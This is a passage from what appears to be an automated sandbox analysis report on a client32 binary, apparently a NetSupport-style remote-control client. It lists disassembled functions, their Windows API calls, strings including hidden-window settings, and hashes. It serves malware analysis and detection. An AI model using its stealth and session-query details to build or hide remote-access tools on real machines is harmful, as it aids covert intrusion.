                                                                                  • SetFilePointer.KERNEL32(?,00000000,00000000,00000001), ref: 1110F4FA
                                                                                  • WriteFile.KERNEL32(?,?,?,?,00000000), ref: 1110F58E
                                                                                  • SetFilePointer.KERNEL32(?,00000000,00000000,00000000), ref: 1110F5B9
                                                                                  • WriteFile.KERNEL32(?,PCIR,00000030,?,00000000), ref: 1110F5CE
                                                                                    • Part of subcall function 11110000: InterlockedDecrement.KERNEL32(?), ref: 11110008
                                                                                  • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,1118B168,000000FF), ref: 1110F5F5
                                                                                  • _free.LIBCMT ref: 1110F628
                                                                                  • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 1110F665
                                                                                  • timeEndPeriod.WINMM(00000001,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 1110F677
                                                                                  • LeaveCriticalSection.KERNEL32(0000017D,?,?,?,?,?,?,?,1118B168,000000FF,?,1110F947,00000001,50D94AA1,0000017D,00000001), ref: 1110F681
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3453290895.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3453225430.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453582705.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453654122.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453691462.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: File$CloseCriticalHandlePointerSectionWrite$DecrementEnterInterlockedLeavePeriod_free_memsettime
                                                                                  • String ID: End Record %s$PCIR
                                                                                  • API String ID: 4278564793-2672865668
                                                                                  • Opcode ID: 2297d0fbe9251eaeeb3cc25f45a368d5b625df3f620643443588fc5d57948bb5
                                                                                  • Instruction ID: c7b3bd1ea8319edfd3cc52dfdc755cda258f2b25611d18eaf89bf58ef2166273
                                                                                  • Opcode Fuzzy Hash: 2297d0fbe9251eaeeb3cc25f45a368d5b625df3f620643443588fc5d57948bb5
                                                                                  • Instruction Fuzzy Hash: 32811875A0070AABD724CFA4C881BEBF7F8FF88704F00492DE66A97240D775A941CB91
                                                                                  Function 110F70E0 Relevance: 22.9, APIs: 8, Strings: 5, Instructions: 176libraryloaderCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • LoadLibraryA.KERNEL32(Wtsapi32.dll,50D94AA1,1102E747,?,00000000), ref: 110F711B
                                                                                  • GetProcAddress.KERNEL32(00000000,WTSQuerySessionInformationA), ref: 110F7179
                                                                                  • wsprintfA.USER32 ref: 110F7235
                                                                                  • SetLastError.KERNEL32(00000078), ref: 110F7242
                                                                                  • wsprintfA.USER32 ref: 110F7267
                                                                                  • GetProcAddress.KERNEL32(?,WTSFreeMemory), ref: 110F72A7
                                                                                  • SetLastError.KERNEL32(00000078), ref: 110F72BC
                                                                                  • FreeLibrary.KERNEL32(?), ref: 110F72D0
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3453290895.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3453225430.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453582705.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453654122.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453691462.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: AddressErrorLastLibraryProcwsprintf$FreeLoad
                                                                                  • String ID: %u.%u.%u.%u$%x:%x:%x:%x:%x:%x:%x:%x$WTSFreeMemory$WTSQuerySessionInformationA$Wtsapi32.dll
                                                                                  • API String ID: 856016564-3838485836
                                                                                  • Opcode ID: cc029828f1d21abf9f8ceca98a157caf4b608a284bbec4fbfb4073d9588458f4
                                                                                  • Instruction ID: 25a542e7ca9f20ccb9d734b321771151ba7e8120a74b68384c663ef2db5eebf1
                                                                                  • Opcode Fuzzy Hash: cc029828f1d21abf9f8ceca98a157caf4b608a284bbec4fbfb4073d9588458f4
                                                                                  • Instruction Fuzzy Hash: 2161B771D042689FDB18CFA98C98AADFFF5BF49301F0581AEF16A97251D6345904CF20
                                                                                  Function 11025000 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 120windowCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • SendMessageA.USER32(?,0000000E,00000000,00000000), ref: 11025036
                                                                                  • SendMessageA.USER32(?,000000BA,00000000,00000000), ref: 11025049
                                                                                  • SendMessageA.USER32(?,000000BB,-00000001,00000000), ref: 1102505A
                                                                                  • SendMessageA.USER32(?,000000C1,00000000,00000000), ref: 11025065
                                                                                  • SendMessageA.USER32(?,000000C4,-00000001,?), ref: 1102507E
                                                                                  • GetDC.USER32(?), ref: 11025085
                                                                                  • SendMessageA.USER32(?,00000031,00000000,00000000), ref: 11025095
                                                                                  • SelectObject.GDI32(?,00000000), ref: 110250A2
                                                                                  • GetTextExtentPoint32A.GDI32(?,00000020,00000001,?), ref: 110250B8
                                                                                  • SelectObject.GDI32(?,?), ref: 110250C7
                                                                                  • ReleaseDC.USER32(?,?), ref: 110250CF
                                                                                  • SetCaretPos.USER32(?,?), ref: 11025111
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3453290895.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3453225430.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453582705.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453654122.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453691462.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: MessageSend$ObjectSelect$CaretExtentPoint32ReleaseText
                                                                                  • String ID:
                                                                                  • API String ID: 4100900918-3916222277
                                                                                  • Opcode ID: 81849d76d252f21a55fd605d5a4a08d2267cf51cac1b4e435e9d7ec204cef2ae
                                                                                  • Instruction ID: b0707e50622e5a2dee3f64ca7938c426cfa52823b6f102614556d1b444951bd6
                                                                                  • Opcode Fuzzy Hash: 81849d76d252f21a55fd605d5a4a08d2267cf51cac1b4e435e9d7ec204cef2ae
                                                                                  • Instruction Fuzzy Hash: 84414C71A41318AFEB10DFA4CD84FAEBBF8EF89700F118169F915AB244DB749900CB60
                                                                                  Function 1101F0D0 Relevance: 22.9, APIs: 11, Strings: 2, Instructions: 116windowCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • _memset.LIBCMT ref: 1101F0FE
                                                                                  • SystemParametersInfoA.USER32(00000029,00000000,?,00000000), ref: 1101F11D
                                                                                    • Part of subcall function 110CCE60: GetWindowRect.USER32(110CEFF5,?), ref: 110CCE7C
                                                                                    • Part of subcall function 110CCE60: SetRectEmpty.USER32(?), ref: 110CCE88
                                                                                  • DeleteObject.GDI32(00000000), ref: 1101F16C
                                                                                  • DeleteObject.GDI32(00000000), ref: 1101F178
                                                                                  • CreateFontIndirectA.GDI32(?), ref: 1101F187
                                                                                  • CreateFontIndirectA.GDI32(?), ref: 1101F19F
                                                                                  • GetMenuItemCount.USER32 ref: 1101F1A7
                                                                                  • _memset.LIBCMT ref: 1101F1CF
                                                                                  • GetMenuItemInfoA.USER32(?,00000000,00000001,?), ref: 1101F20C
                                                                                  • __strdup.LIBCMT ref: 1101F221
                                                                                  • SetMenuItemInfoA.USER32(?,00000000,00000001,00000030), ref: 1101F279
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3453290895.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3453225430.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453582705.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453654122.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453691462.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: InfoItemMenu$CreateDeleteFontIndirectObjectRect_memset$CountEmptyParametersSystemWindow__strdup
                                                                                  • String ID: 0$MakeOwnerDraw
                                                                                  • API String ID: 1249465458-1190305232
                                                                                  • Opcode ID: 8c9bd2224f42fac49adbc09d6f8f2acc0ae91da077bc4100c348b21e51c723fb
                                                                                  • Instruction ID: cad075490b8b101532292c9a84c7126ab9bfd0db94d612dc2b0baac2de7b47d0
                                                                                  • Opcode Fuzzy Hash: 8c9bd2224f42fac49adbc09d6f8f2acc0ae91da077bc4100c348b21e51c723fb
                                                                                  • Instruction Fuzzy Hash: 19417E71D012399BDB64DFA4CC89BD9FBB8BB09708F0001D9E508A7284DBB46A84CF94
                                                                                  Function 1102370A Relevance: 21.4, APIs: 10, Strings: 2, Instructions: 363windowCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                    • Part of subcall function 1115BAE0: IsIconic.USER32(?), ref: 1115BB87
                                                                                    • Part of subcall function 1115BAE0: ShowWindow.USER32(?,00000009), ref: 1115BB97
                                                                                    • Part of subcall function 1115BAE0: BringWindowToTop.USER32(?), ref: 1115BBA1
                                                                                  • CheckMenuItem.USER32(00000000,000013EB,-00000009), ref: 1102384D
                                                                                  • ShowWindow.USER32(?,00000003), ref: 110238D1
                                                                                  • LoadMenuA.USER32(00000000,000013A3), ref: 110239FB
                                                                                  • GetSubMenu.USER32(00000000,00000000), ref: 11023A09
                                                                                  • CheckMenuItem.USER32(00000000,000013EB,?), ref: 11023A29
                                                                                  • GetDlgItem.USER32(?,000013B2), ref: 11023A3C
                                                                                  • GetWindowRect.USER32(00000000), ref: 11023A43
                                                                                  • PostMessageA.USER32(?,00000111,?,00000000), ref: 11023A99
                                                                                  • DestroyMenu.USER32(?,?,00000000,00000000,00000102,?,?,?,00000000), ref: 11023AA3
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3453290895.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3453225430.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453582705.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453654122.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453691462.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Menu$Window$Item$CheckShow$BringDestroyIconicLoadMessagePostRect
                                                                                  • String ID: AddToJournal$Chat
                                                                                  • API String ID: 693070851-2976406578
                                                                                  • Opcode ID: 4e8affa197535ad0660103244a90f227890d3a0ada2779ccdef05f8d718aa204
                                                                                  • Instruction ID: 808c1e48a155f27d2b3c0586fadc3707d2cf985dccefb9094def5a9ab05a8e38
                                                                                  • Opcode Fuzzy Hash: 4e8affa197535ad0660103244a90f227890d3a0ada2779ccdef05f8d718aa204
                                                                                  • Instruction Fuzzy Hash: 58A10334F44616ABDB08CF64CC85FAEB3E9AB8C704F50452DE6569F6C0DBB4A900CB95
                                                                                  Function 110A1460 Relevance: 21.3, APIs: 1, Strings: 11, Instructions: 285timeCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                    • Part of subcall function 110D0960: __strdup.LIBCMT ref: 110D097A
                                                                                    • Part of subcall function 110D0A10: _free.LIBCMT ref: 110D0A3D
                                                                                    • Part of subcall function 110D15C0: wvsprintfA.USER32(?,?,1102CC61), ref: 110D15EB
                                                                                    • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                    • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                    • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                    • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                  • GetLocalTime.KERNEL32(?), ref: 110A1778
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3453290895.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3453225430.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453582705.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453654122.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453691462.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: ErrorExitLastLocalMessageProcessTime__strdup_freewsprintfwvsprintf
                                                                                  • String ID: %s\$%s\%s$%s_$CLASSID=$IsA()$LESSON=$[JNL] MakeFileName ret %s$\/:*?"<>|$_%04d_%02d_%02d_%02d%02d$_%s$e:\nsmsrc\nsm\1210\1210f\ctl32\NSMString.h
                                                                                  • API String ID: 2014016395-1677429133
                                                                                  • Opcode ID: 880920969d41afe499fca9c871a626bbba516486696330b4c6c744914744d6f5
                                                                                  • Instruction ID: aef08c5c19416ca6c78363d8fb1b9fc7de7af93cef0e20b47086b6b370679a0b
                                                                                  • Opcode Fuzzy Hash: 880920969d41afe499fca9c871a626bbba516486696330b4c6c744914744d6f5
                                                                                  • Instruction Fuzzy Hash: 44B1AF79E00229ABDB15DBA4DD41FEDB7F5AF59388F0441D4E80A67280EB307B44CEA5
                                                                                  Function 11131320 Relevance: 21.2, APIs: 6, Strings: 6, Instructions: 187COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • GetLastError.KERNEL32(?,11139C95,00000000), ref: 11131428
                                                                                  • ShowWindow.USER32(00000000,00000000,?,11139C95,00000000), ref: 11131457
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3453290895.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3453225430.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453582705.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453654122.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453691462.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: ErrorLastShowWindow
                                                                                  • String ID: #32770$Client$Hidden$StatusMode$UI.CPP$gUI.hidden_window
                                                                                  • API String ID: 3252650109-4091810678
                                                                                  • Opcode ID: 3934f158285cda88db21c3109430663c83d793430f4a9331a1973ddc11de89e1
                                                                                  • Instruction ID: 1b40a51cdbaebc86ba70b46d463032212dc909346aab7ab50ce078dfded898e8
                                                                                  • Opcode Fuzzy Hash: 3934f158285cda88db21c3109430663c83d793430f4a9331a1973ddc11de89e1
                                                                                  • Instruction Fuzzy Hash: 2161D571B84325ABE711CF90CC85F69F774E784B29F104129F625AB2C4EBB56940CB84
                                                                                  Function 110F7300 Relevance: 21.1, APIs: 9, Strings: 3, Instructions: 137libraryloaderCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • LoadLibraryA.KERNEL32(Wtsapi32.dll,50D94AA1,1102E747,?,00000000,?,?,?,?,?,?,?,?,?,?,00000000), ref: 110F732D
                                                                                  • GetProcAddress.KERNEL32(00000000,WTSQuerySessionInformationA), ref: 110F7372
                                                                                  • GetProcAddress.KERNEL32(?,WTSFreeMemory), ref: 110F73C3
                                                                                  • SetLastError.KERNEL32(00000078,?,?,?,?,?,?,?,?,?,?,00000000,11189DD0,000000FF,?,1102A280), ref: 110F73D8
                                                                                  • GetProcAddress.KERNEL32(?,WTSFreeMemory), ref: 110F73FD
                                                                                  • SetLastError.KERNEL32(00000078,?,?,?,?,?,?,?,?,?,?,?,?,00000000,11189DD0,000000FF), ref: 110F7412
                                                                                  • FreeLibrary.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,11189DD0,000000FF), ref: 110F7423
                                                                                  • SetLastError.KERNEL32(00000078,?,?,?,?,?,?,?,?,?,?,00000000,11189DD0,000000FF,?,1102A280), ref: 110F7440
                                                                                  • FreeLibrary.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000,11189DD0,000000FF,?,1102A280), ref: 110F7451
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3453290895.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3453225430.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453582705.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453654122.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453691462.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: AddressErrorLastLibraryProc$Free$Load
                                                                                  • String ID: WTSFreeMemory$WTSQuerySessionInformationA$Wtsapi32.dll
                                                                                  • API String ID: 2188719708-2019804778
                                                                                  • Opcode ID: 8f9cdb94902dff30692c8c6071e3b83f8d748f677524ce08c30458c8737fae8d
                                                                                  • Instruction ID: 4e6ae02227e90de241cbe6e1e3770e4d50810e342ffe13a4e1f679076b39a632
                                                                                  • Opcode Fuzzy Hash: 8f9cdb94902dff30692c8c6071e3b83f8d748f677524ce08c30458c8737fae8d
                                                                                  • Instruction Fuzzy Hash: 49511371D4121AEFDB14DFD9D9C5AAEFBF5FB48300F51846AE829E3600DB34A9018B61
                                                                                  Function 1103F520 Relevance: 21.1, APIs: 7, Strings: 5, Instructions: 126windowCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                    • Part of subcall function 110CF130: GetDlgItem.USER32(?,000017DD), ref: 110CF18A
                                                                                    • Part of subcall function 110CF130: ShowWindow.USER32(00000000,00000000), ref: 110CF1AF
                                                                                    • Part of subcall function 110CF130: GetWindowRect.USER32(00000000,?), ref: 110CF1DD
                                                                                    • Part of subcall function 110CF130: GetObjectA.GDI32(00000000,0000003C,?), ref: 110CF21D
                                                                                    • Part of subcall function 110CF130: GetWindowTextA.USER32(00000000,?,00000100), ref: 110CF276
                                                                                  • GetDlgItem.USER32(?,00000472), ref: 1103F557
                                                                                    • Part of subcall function 11160450: SetPropA.USER32(00000000,00000000,00000000), ref: 1116046E
                                                                                    • Part of subcall function 11160450: SetWindowLongA.USER32(00000000,000000FC,1115FE60), ref: 1116047F
                                                                                  • wsprintfA.USER32 ref: 1103F5D1
                                                                                  • GetSystemMenu.USER32(?,00000000), ref: 1103F5F6
                                                                                  • EnableMenuItem.USER32(00000000,0000F060,00000002), ref: 1103F604
                                                                                  • SetWindowPos.USER32(00000000,00000001,00000000,00000000,00000000,00000000,00000003), ref: 1103F663
                                                                                  • SetWindowPos.USER32(00000000,000000FF,00000000,00000000,00000000,00000000,00000003), ref: 1103F692
                                                                                  • MessageBeep.USER32(00000000), ref: 1103F696
                                                                                    • Part of subcall function 111457A0: GetModuleFileNameA.KERNEL32(00000000,?,00000104,11195AD8), ref: 1114580D
                                                                                    • Part of subcall function 111457A0: SHGetFolderPathA.SHFOLDER(00000000,00000026,00000000,00000000,?,1111025B), ref: 1114584E
                                                                                    • Part of subcall function 111457A0: SHGetFolderPathA.SHFOLDER(00000000,0000001A,00000000,00000000,?), ref: 111458AB
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3453290895.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3453225430.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453582705.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453654122.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
